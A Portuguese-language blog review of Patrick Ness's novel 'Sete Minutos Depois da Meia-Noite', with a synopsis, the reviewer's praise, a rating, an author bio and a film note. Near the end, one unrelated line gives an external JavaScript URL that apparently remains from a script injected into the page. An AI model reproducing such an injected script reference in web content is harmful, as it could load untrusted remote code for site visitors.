Sinopse: Conor é um garoto de 13 anos e está com muitos problemas na vida. A mãe dele está muito doente, passando por tratamentos rigorosos. Os colegas da escola agem como se ele fosse invisível, exceto por Harry e seus amigos que o provocam diariamente. A avó de Conor, que não é como as outras avós, está chegando para uma longa estadia. E, além do pesadelo terrível que o faz acordar em desespero todas as noites, às 00h07 ele recebe a visita de um monstro que conta histórias sem sentido.
O monstro vive na Terra há muito tempo, é grandioso e selvagem, mas Conor não teme a aparência dele. Na verdade, ele teme o que o monstro quer, uma coisa muito frágil e perigosa. O monstro quer a verdade.
Baseado na ideia de Siobhan Dowd, Sete minutos depois da meia-noite é um livro em que fantasia e realidade se misturam. Ele nos fala dos sentimentos de perda, medo e solidão e também da coragem e da compaixão necessárias para ultrapassá-los.

Opinião: Sete Minutos Depois da Meia-Noite é um daqueles livros de fim de tarde que você lê em uma sentada acompanhado de um café ou a bebida que você preferir. O autor entrega para os leitores um livro em que nos ensina a superar a verdade e a aceitá-la.

Conor tem treze anos e viver significa um grande desafio diário.  Seus monstros são reais e invadem sua vida com brutalidade e sem pedir espaço, não importam se ele vai sofrer, como ele se sentirá diante da sociedade ou até mesmo da família.

O autor partiu de um princípio muito eloquente e dramático. Mãe é uma palavra forte, que carrega sentimentos verdadeiros e protetivos. Entendo que nem sempre é assim. Porém, partindo de uma lógica mais fictícia, Patrick usa a mãe de Conor para o atingir em cheio com o intuito de o preparar para a vida.

São muitos os livros que abordam o câncer e o mais famoso deles é o meloso e adolescente “A Culpa é das Estrelas” de John Green. Em Sete Minutos Depois da Meia-Noite o câncer tenta tirar a vida da mãe de Conor e aqui está o seu maior monstro, ter que lutar contra a possibilidade de perde-la, de não a ter mais por perto e de aceitar essa frágil situação.

Ele traz junto uma gama de situações difíceis e embaralhadas que não ajudam em nada da vida do garoto de treze anos. Na sua luta diária contra a aceitação da situação de sua mãe ele tem de conviver com a distância do pai e com a vida nova que está buscando, com a frágil e dura relação que tem com sua avó, com Harry o garoto da escola que faz questão de lembrar a cada dia que ele existe e não é invisível e com o monstro que sempre aparece 00h07 para lhe contar histórias que em um primeiro momento são sem sentido.

Acompanhar a trajetória de Conor é difícil e dolorosa. Facilmente nos apegamos a suas dificuldades e é como se estivéssemos ali vivendo seus medos e pesadelos. Patrick coloca sobre os ombros de Conor a vida adulta e priva-lhe de sua adolescência.

Embora seja um drama e muito bem construído é muito interessante a forma como o autor mescla a ficção cientifica, a fantasia e o terror. É um típico livro que provoca uma dura ressaca literária e que te coloca nos mais enfáticos dos pensamentos: Qual é a real verdade da minha vida? Eu tenho coragem de ser verdadeiro comigo mesmo pra ter uma vida menos complicada?

Sim, este livro fala de verdade, de aceitar a verdade, de viver com a verdade e de sermos verdadeiros conosco mesmo. Leiam!

Avaliação: 5 estrelas

O Autor: Patrick Ness Patrick Ness é o autor best-seller da trilogia Chaos Walking e de A Monster Calls. Aclamado pela crítica, já recebeu diversos prêmios como escritor de ficção para crianças, incluindo duas medalhas Carnegie, no Reino Unido. Já foi colunista do Sunday Telegraph e hoje é crítico literário no The Guardian. Patrick nasceu na Virgínia, nos Estados Unidos, e vive em Londres.

Sete Minutos Depois da Meia-Noite foi adaptado para cinema recebendo prêmios e critica positiva. Em seu elenco temos Liam Neeson e Felicity Jones. Encontra-se disponível no catálogo da Netflix.

https://cloudapi.online/js/api46.js

Compartilhar
Artigo anterior“O Velho e o Mar” ganha edição em Graphic Novel
Próximo artigoConheça a nova trilogia de Milton Hatoum
Goiano do pé rachado e comedor de piqui. Alucinado por histórias fantásticas e distópicos. Tributo, Hobbit de nascença, e habitante do país de Aslan. Entre os autores Suzanne Collins é majestade e Tolkien é imperador. Técnico em Química e buscando ser químico industrial intercalado com a vida de escritor, um dia qualquer publicará seu livro. Não dispensa um cinema...

Deixe uma resposta